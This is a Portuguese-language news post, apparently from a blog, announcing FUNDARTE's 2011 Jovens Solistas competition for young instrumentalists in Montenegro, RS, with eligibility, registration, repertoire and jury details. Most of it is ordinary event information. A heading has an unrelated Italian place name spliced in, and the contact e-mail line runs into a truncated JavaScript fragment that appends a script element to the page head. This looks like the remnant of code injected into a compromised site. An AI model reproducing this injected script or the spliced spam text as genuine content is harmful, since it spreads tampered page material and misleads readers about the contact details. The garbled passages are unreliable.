ConcursoNotíciaRio Grande do Sul

Concurso Jovens Solistas

Inscrições abertas para o Concurso Jovens Solistas da Orquestra de Câmara FUNDARTE.

Estão abertas até o dia três de novembro, as inscrições gratuitas para o Concurso Jovens Solistas, que será realizado pela Fundação Municipal de Artes de Montenegro – FUNDARTE, no dia 9 de novembro de 2011,  com o objetivo de selecionar jovens músicos, que   atuarão como solistas na temporada de concertos da Orquestra de Câmara FUNDARTE em 2012.

A seleção é de âmbito nacional,  para todas as modalidades de instrumentos, exceto canto.

 

Público-alvo

Indicada para estudantes ou profissionais com até 25 anos, tem como objetivo oferecer a jovens músicos a oportunidade de atuarem como solistas da Orquestra de Câmara Fundarte, bem como estimular e descobrir novos talentos.

 

O Concurso Jovens Solistas comune di castelnuovo berardenga

De âmbito nacional para todas as modalidades de instrumentos é indicada para estudantes ou profissionais com até 25 anos. Tem como objetivo oportunizar  a jovens músicos atuarem como solistas da série de concertos do projeto SESI Catedrais e outros projetos da Orquestra de Câmara Fundarte,  bem como descobrir jovens instrumentistas que estão se destacando em seus estudos musicais.

 

Para o maestro Antônio Borges-Cunha, regente titular e diretor artístico da Orquestra de Câmara Fundarte e para a professora Therezinha Petry Cardona, diretora executiva da orquestra, ambos  integrantes da comissão organizadora, a maior importância da seleção é propiciar ao Jovem Solista que deseja seguir carreira, a oportunidade de tocar numa orquestra que,  ao longo dos anos,  vem  realizando um grande número de concertos pelo Interior do RS e  desenvolvendo  formação de platéia com função pedagógica e educacional.

Borges-Cunha informa que a Orquestra de Câmara Fundarte é a  única orquestra brasileira que está oferecendo,  de maneira contínua, oportunidades para jovens atuarem como solista de uma orquestra.

A  orquestra tem contribuído para a experiência prática de músicos jovens com potencial para seguir a carreira de músico profissional”, acrescenta.

Na sua 9ª edição, entre os 89 músicos que já atuaram como Jovens Solistas da Orquestra de Câmara FUNDARTE e que conquistaram bolsas em universidades dos Estados Unidos onde estão atualmente,  destacam-se Paula Bujes (violino), Pablo Ramon Hernandez (oboé), Moisés Cunha (violino), além de Moisés dos Santos (violino), que estuda na Europa, em Salzburgo, Áustria.

 

Como se inscrever para a Seleção

As inscrições poderão ser feitas até o próximo dia três de novembro,  pela internet ou pelos Correios, mediante ficha de inscrição, anexada de  Curriculum Vitae e repertório das obras estudadas.

Na modalidade pelos Correios, a ficha de inscrição anexada a documentação deverá ser enviada para a Fundação Municipal de Artes de Montenegro – FUNDARTE, Rua Capitão Porfírio, 2141, Montenegro, RS, CEP 95780-000.

 

Data e local da Seleção

Será realizada no dia 9 de novembro de 2011, das 9 ás 12 e das 13h30min às 18 horas, na Fundação Municipal de Artes de Montenegro – FUNDARTE/RS, Rua Capitão Porfírio, 2141, Montenegro,  RS.

 

Repertório

O repertório deverá se constituir de uma peça musical, brasileira ou estrangeira, para solista(s) e Orquestra de Cordas, sendo possível, também, obras que poderão ser transcritas para Orquestra de Cordas.

Obs.: Os candidatos devem providenciar o seu pianista acompanhador para o Concurso.

 

Comissão Organizadora

Maestro Dr. Antônio Borges-Cunha

Professora Therezinha Petry Cardona

Gorete Junges – Coordenadora de Comunicação da FUNDARTE

 

Comissão de Avaliação

Antônio Carlos Borges-Cunha – Regente Titular da Orquestra de Câmara Fundarte

Therezinha Petry Cardona – Diretora Executiva da Orquestra

Marcelo Piraino – Professor de clarinete da Fundarte

Olinda Allessandrini – pianista

João Campos Neto – Violinista – Spalla da Orquestra Fundarte

Coordenadores de naipes da Orquestra Fundarte: Martinêz Nunes, (viola), violoncelo, Fábio Chagas  (violoncelo) e  Luciano Dal Molin (contrabaixo).

 

Informações e inscrições

Telefone para informações: XX 51 3632.1879

SITE:  www.fundarte.rs.gov.br

E-MAIL: tcardona@terra.com.brif (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.